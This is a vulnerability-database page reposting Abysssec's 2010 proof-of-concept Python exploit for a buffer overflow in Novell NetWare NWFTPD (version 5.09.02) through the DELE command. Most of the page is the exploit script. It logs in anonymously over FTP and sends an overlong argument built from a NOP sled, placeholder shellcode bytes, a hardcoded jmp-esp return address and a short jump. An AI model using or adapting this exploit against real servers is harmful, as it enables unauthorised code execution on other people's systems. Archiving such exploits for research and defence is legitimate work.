Lucene search
K

Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Bof

🗓️ 07 Sep 2010 00:00:00Reported by AbysssecType 
zdt
 zdt
🔗 0day.today👁 10 Views

Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflo

Code
========================================================
Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Bof
========================================================

  Title            :  Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
  Version          :  NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
  Analysis         :  http://www.abysssec.com
  Vendor           :  http://www.Novell.com
  Impact           :  Critical
  Contact          :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          :  @abysssec
'''
from ftplib import FTP
import sys
 
try:
    netwareServerIp = '127.0.0.1'
    ftp = FTP(netwareServerIp)             
    ftp.login('anonymous','[email protected]')
    buffer = "/"
    buffer += "\x90"*107                #nops
    buffer += "\xcc"*413                #shellcode part2 = 413 byte
    buffer += "\xb9\xa4\xe0\x91"            #EIP - jmp esp from nwftpd.nlm module
    buffer += "\xcc"*124                #shellcode part1 = 124 byte
    buffer += "\x08\xeb\x90\x90\x90\x90"        #short jmp to shellcode part2
    ftp.voidcmd('DELE ' + buffer)
     
except Exception,err:
    print err



#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation